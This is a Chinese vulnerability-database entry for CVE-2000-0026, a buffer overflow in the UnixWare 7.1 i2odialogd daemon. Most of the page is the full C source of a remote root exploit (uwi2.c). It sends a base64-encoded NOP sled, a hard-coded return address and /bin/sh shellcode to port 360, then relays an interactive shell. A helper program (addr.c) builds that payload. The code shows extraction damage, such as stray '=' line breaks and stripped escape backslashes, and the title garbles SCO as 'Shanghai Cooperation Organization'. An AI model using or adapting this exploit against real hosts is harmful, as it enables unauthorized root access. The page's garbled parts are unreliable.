上海合作组织UnixWare i2odialogd远程缓冲区溢出漏洞
漏洞ID | 1105652 | 漏洞类型 | 缓冲区溢出 |
发布时间 | 1999-12-22 | 更新时间 | 2005-05-02 |
CVE编号 | CVE-2000-0026 |
CNNVD-ID | CNNVD-199912-067 |
漏洞平台 | SCO | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
UnixWarei2odialogd守护进程中存在缓冲区溢出漏洞,远程攻击者利用该漏洞通过一个长用户名/密码认证字符串获得根访问。
|漏洞EXP
source: http://www.securityfocus.com/bid/876/info
UnixWare is a variant of the Unix operating system originally written by SCO, and distributed and maintained by Caldera.
i20dialogd is a daemon which provides a front-end for controlling the i20 subsystem. It is shipped with SCO Unixware and installed running as root by default. In its authentication mechanism exists a serious buffer overflow vulnerability. The username/password buffers are of a fixed length (88+ characters) with no bounds checking performed on them. Because of this it is possible to overflow the buffer, corrupt the stack and overwrite the return address altering the flow of execution (and running arbitrary code). It should be noted that exploit code must be encoded (base64) before being sent to the server.
/* uwi2.c
*
* i2o remote root exploit for UnixWare 7.1
* compile on UnixWare with cc -o uwi2 uwi2.c -lsocket -lnsl
* ./uwi2 <hostname> =
* The hard-coded RET address is 0x8047d4c =
*
* To either replace the shellcode or change the offset you must =
* first craft a program which outputs, in this order:
* - 92 bytes of your RET address (EIP starts at 89)
* - NOPs, as many as you would like
* - your shellcode
* - the character ":"
* - any character, maybe "A", as I've done below
* - NULL
* When printf()'ing this string, do NOT append a newline!
* You then pipe the output of this program to a MIME encoder (mimencode =
* on UnixWare). You then take the output of this program and paste it
* where I've marked below.
*
* Brock Tellier [email protected]
*
*/
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>
#define BUFLEN 10000
/* since we're overflowing an Authenticate: Basic username */
/* our exploit code must be base64(MIME) encoded */
char *mimecode =
/**** CHANGE THIS PART OF THE EXPLOIT STRING ****/
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQTH0ECEx9BAhMfQQITH0ECEx9BAhMfQQITH0ECEx9BAhMfQQITH0ECJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ6xteMduJXgeJXgyIXhExwLA7jX4HiflT=
"
"UVZW6xDo4P///y9iaW4vc2iqqqqqmqqqqqoHqpCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkDpB";
/************************************************/
char *auth=
"GET / HTTP/1.0rn"
"Host: localhost:360rn"
"Accept: text/htmlrn"
"Accept-Encoding: gzip, compressrn"
"Accept-Language: enrn"
"Negotiate: transrn"
"User-Agent: xnecrn"
"Authorization: Basic";
char buf[BUFLEN];
char sockbuf[BUFLEN];
char c;
int offset=0;
int i, ascii,num;
int i2oport = 360;
int sock;
int addr = 0x80474b4;
struct sockaddr_in sock_a;
struct hostent *host;
void main (int argc, char *argv[]) {
=
if(argc < 2) {
fprintf(stderr, "Error:Usage: %s <hostname> n", argv[0]);
exit(0);
}
if(argc == 3) offset=atoi(argv[2]);
=
sprintf(buf, "%s %s rnrn", auth, mimecode);
buf[BUFLEN - 1] = 0;
fprintf(stderr, "i2odialogd remote exploit for UnixWare 7.1n");
fprintf(stderr, "Brock Tellier [email protected]");
if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
perror("gethostbyname"); =
exit(-1);
}
=
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("create socket");
exit(-1);
}
sock_a.sin_family=AF_INET;
sock_a.sin_port=htons(i2oport);
memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
perror("create connect");
exit(-1);
}
fflush(stdout);
// write exploit
write(sock,buf,strlen(buf));
//begin read
while(1) {
fd_set input;
FD_SET(0,&input);
FD_SET(sock,&input);
select(sock+1,&input,NULL,NULL,NULL);
if(FD_ISSET(sock,&input)) {
num=read(sock,sockbuf,BUFLEN);
write(1,sockbuf,num);
}
if(FD_ISSET(0,&input))
write(sock,sockbuf,read(0,sockbuf,BUFLEN));
}
}
------
--- addr.c ---
/* =
* addr.c - Add-on for the UnixWare 7.1 remote root exploit in i2dialogd
* simply MIME encode the output of this program and put into the =
* appropriate place in uwi2.c
* =
* Usage: cc -o addr addr.c; ./addr <offset> <size>
*
* Brock Tellier [email protected]
*/
#include <stdio.h>
#define NOP 0x90
char scoshell[]= =
"xebx1bx5ex31xdbx89x5ex07x89x5ex0cx88x5ex11x31xc0"
"xb0x3bx8dx7ex07x89xf9x53x51x56x56xebx10xe8xe0xff"
"xffxff/bin/shxaaxaaxaaxaax9axaaxaaxaaxaax07xaa";
void main(int argc, char *argv[]) {
long addr;
char buf[2000];
int i;
int offset;
int size = 400;
if (argc > 1) offset = atoi(argv[1]);
if (argc > 2) size = atoi(argv[2]);
addr=0x8046000 + offset;
memset(buf, NOP, size);
for(i=60;i<100;i+=4)*(int *)&buf[i]=addr;
for(i = 0; i < strlen(scoshell); i++)
buf[i+300] = scoshell[i];
buf[size - 3] = ':'; =
buf[size - 2] = 'A';
buf[size - 1] = 0;
fprintf(stderr, "using addr 0x%x with offset %d n", addr, offset);
fprintf(stderr, "mime-encode the stdoutput!n");
printf(buf);
}
|参考资料
来源:BID
名称:876
链接:http://www.securityfocus.com/bid/876
来源:OSVDB
名称:6310
链接:http://www.osvdb.org/6310
来源:BUGTRAQ
名称:19991223FYI,SCOSecuritypatchesavailable.
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=94606167110764&w;=2
相关推荐: Alcatel Speed Touch Pro With Firewall ADSL Router DNS Poisoning Vulnerability
Alcatel Speed Touch Pro With Firewall ADSL Router DNS Poisoning Vulnerability 漏洞ID 1097677 漏洞类型 Design Error 发布时间 2004-11-12 更新时间 …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666